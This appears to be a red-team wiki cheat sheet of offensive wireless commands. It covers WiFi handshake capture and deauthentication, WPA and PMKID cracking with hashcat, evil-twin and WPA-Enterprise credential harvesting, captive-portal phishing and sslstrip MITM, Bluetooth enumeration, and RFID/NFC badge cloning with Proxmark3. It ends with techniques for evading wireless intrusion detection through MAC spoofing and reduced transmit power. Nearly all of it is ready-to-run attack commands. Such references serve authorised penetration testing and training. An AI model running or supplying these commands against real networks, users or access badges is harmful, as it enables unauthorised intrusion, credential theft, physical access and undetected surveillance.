Wireless Testing

WiFi Attacks

Reconnaissance

# Enable monitor mode
airmon-ng start wlan0
# or
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Scan for networks
airodump-ng wlan0mon
airodump-ng wlan0mon --band abg  # All bands
airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture  # Target specific AP

# Kismet (comprehensive wireless scanner)
kismet -c wlan0mon

WPA/WPA2 PSK Attacks

# Capture handshake
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

# Deauth to force reconnection (capture handshake)
aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

# Check if handshake captured
aircrack-ng capture-01.cap

# Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Crack with hashcat (convert first)
# https://hashcat.net/cap2hashcat/
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# PMKID attack (no handshake needed)
# https://github.com/ZerBea/hcxdumptool
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 pmkid.hc22000 wordlist.txt

WPA3 Attacks

# Dragonblood attacks (CVE-2019-9494, CVE-2019-9496)
# https://github.com/vanhoefm/dragonslayer

# WPA3 downgrade attack
# Force clients to use WPA2 instead
# Create rogue AP with same SSID but WPA2 only

# Timing side-channel attack
# https://wpa3.mathyvanhoef.com/

WPA Enterprise Attacks

# EAP downgrade / Evil Twin
# https://github.com/s0lst1c3/eaphammer
eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid "CorpWiFi" --creds

# hostapd-mana for credential capture
# https://github.com/sensepost/hostapd-mana

# Capture RADIUS credentials
# Crack with asleap or hashcat
asleap -C <challenge> -R <response> -W wordlist.txt

# EAP-TLS certificate attack
# Extract certificates from supplicant config
# Create rogue RADIUS server with stolen certs

WEP Attacks (Legacy)

# Capture IVs
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

# ARP replay attack
aireplay-ng -3 -b <AP_MAC> -h <YOUR_MAC> wlan0mon

# Crack when enough IVs captured
aircrack-ng capture-01.cap

Rogue Access Point

# Create evil twin
# https://github.com/wifiphisher/wifiphisher
wifiphisher -aI wlan0 -eI wlan1 -p firmware-upgrade

# Manual setup with hostapd
cat > hostapd.conf << EOF
interface=wlan0
driver=nl80211
ssid=Free_WiFi
channel=6
hw_mode=g
EOF
hostapd hostapd.conf

# Setup DHCP and routing
dnsmasq -C dnsmasq.conf
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

WiFi Pineapple Techniques

# Karma attack - respond to all probe requests
# PineAP in WiFi Pineapple

# Captive portal credential harvesting
# Redirect all HTTP traffic to phishing page

# MITM with SSLstrip
sslstrip -l 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Bluetooth Attacks

Reconnaissance

# Enable Bluetooth adapter
hciconfig hci0 up

# Scan for devices
hcitool scan
hcitool inq

# Get device info
hcitool info <BD_ADDR>

# Service discovery
sdptool browse <BD_ADDR>

# BlueZ tools
bluetoothctl
> scan on
> devices

BlueBorne (CVE-2017-0781, CVE-2017-0782, etc.)

# Check if vulnerable
# https://github.com/ArmEss/BlueBorne-v2
python3 blueborne_scanner.py <BD_ADDR>

KNOB Attack (CVE-2019-9506)

# Key Negotiation of Bluetooth attack
# Reduces encryption key entropy
# Requires specialized hardware and software

BLE (Bluetooth Low Energy)

# Scan for BLE devices
# https://github.com/securing/gattacker
hcitool lescan

# Connect and enumerate services
gatttool -b <BD_ADDR> -I
> connect
> primary
> characteristics

# BLE CTF tools
# https://github.com/hackgnar/ble_ctf

Bluetooth Sniffing

# Ubertooth
# https://github.com/greatscottgadgets/ubertooth
ubertooth-scan
ubertooth-btbb -f -c output.pcap

# Analyze with Wireshark
wireshark -i ubertooth

RFID/NFC Attacks

Proxmark3

# Read card
proxmark3> lf search
proxmark3> hf search

# Clone EM410x (125kHz)
proxmark3> lf em 410x clone --id <ID>

# Clone MIFARE Classic
proxmark3> hf mf autopwn

# Sniff transactions
proxmark3> hf 14a sniff

NFC Tools (Android)

# NFC Tools app - Read/Write tags
# MIFARE Classic Tool - Crack/clone MIFARE

# ACR122U USB reader
nfc-list
nfc-mfclassic r a dump.mfd  # Read
nfc-mfclassic w a dump.mfd  # Write

Badge Cloning

# HID iClass
proxmark3> hf iclass dump

# Read with flipper zero
# https://flipperzero.one/

# Long range readers
# ESPKey for HID readers
# https://redteamtools.com/espkey

Wireless IDS Evasion

Channel Hopping

# Rapidly change channels to avoid detection
while true; do
    for ch in 1 6 11; do
        iwconfig wlan0mon channel $ch
        sleep 1
    done
done

MAC Spoofing

# Change MAC address
ip link set wlan0 down
macchanger -r wlan0
ip link set wlan0 up

# Or manual
ip link set dev wlan0 address XX:XX:XX:XX:XX:XX

Signal Strength Control

# Reduce TX power to avoid detection
iwconfig wlan0 txpower 1

Tools Summary

Tool

Purpose

aircrack-ng suite

WiFi cracking

Wifiphisher

Evil twin attacks

Kismet

Wireless recon

hcxtools

PMKID attacks

Bettercap

MITM framework

Proxmark3

RFID/NFC

Ubertooth

Bluetooth sniffing

Flipper Zero

Multi-protocol

Resources

PreviousRT/EDR NextSocial Engineering

Last updated 8 days ago

Was this helpful?

hashtagWiFi Attacks

hashtagReconnaissance

hashtagWPA/WPA2 PSK Attacks

hashtagWPA3 Attacks

hashtagWPA Enterprise Attacks

hashtagWEP Attacks (Legacy)

hashtagRogue Access Point

hashtagWiFi Pineapple Techniques

hashtagBluetooth Attacks

hashtagReconnaissance

hashtagBlueBorne (CVE-2017-0781, CVE-2017-0782, etc.)

hashtagKNOB Attack (CVE-2019-9506)

hashtagBLE (Bluetooth Low Energy)

hashtagBluetooth Sniffing

hashtagRFID/NFC Attacks

hashtagProxmark3

hashtagNFC Tools (Android)

hashtagBadge Cloning

hashtagWireless IDS Evasion

hashtagChannel Hopping

hashtagMAC Spoofing

hashtagSignal Strength Control

hashtagTools Summary

hashtagResources

WiFi Attacks

Reconnaissance

WPA/WPA2 PSK Attacks

WPA3 Attacks

WPA Enterprise Attacks

WEP Attacks (Legacy)

Rogue Access Point

WiFi Pineapple Techniques

Bluetooth Attacks

Reconnaissance

BlueBorne (CVE-2017-0781, CVE-2017-0782, etc.)

KNOB Attack (CVE-2019-9506)

BLE (Bluetooth Low Energy)

Bluetooth Sniffing

RFID/NFC Attacks

Proxmark3

NFC Tools (Android)

Badge Cloning

Wireless IDS Evasion

Channel Hopping

MAC Spoofing

Signal Strength Control

Tools Summary

Resources